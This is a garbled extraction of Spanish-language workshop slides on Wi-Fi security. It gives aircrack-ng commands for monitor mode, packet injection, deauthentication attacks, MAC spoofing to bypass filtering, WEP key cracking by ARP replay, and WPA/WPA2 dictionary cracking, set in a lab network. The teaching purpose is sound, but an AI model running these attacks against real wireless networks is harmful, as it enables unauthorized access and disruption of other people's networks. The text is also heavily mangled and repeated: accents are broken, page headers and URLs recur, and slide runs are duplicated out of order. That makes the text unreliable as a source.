Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 29: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 30: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

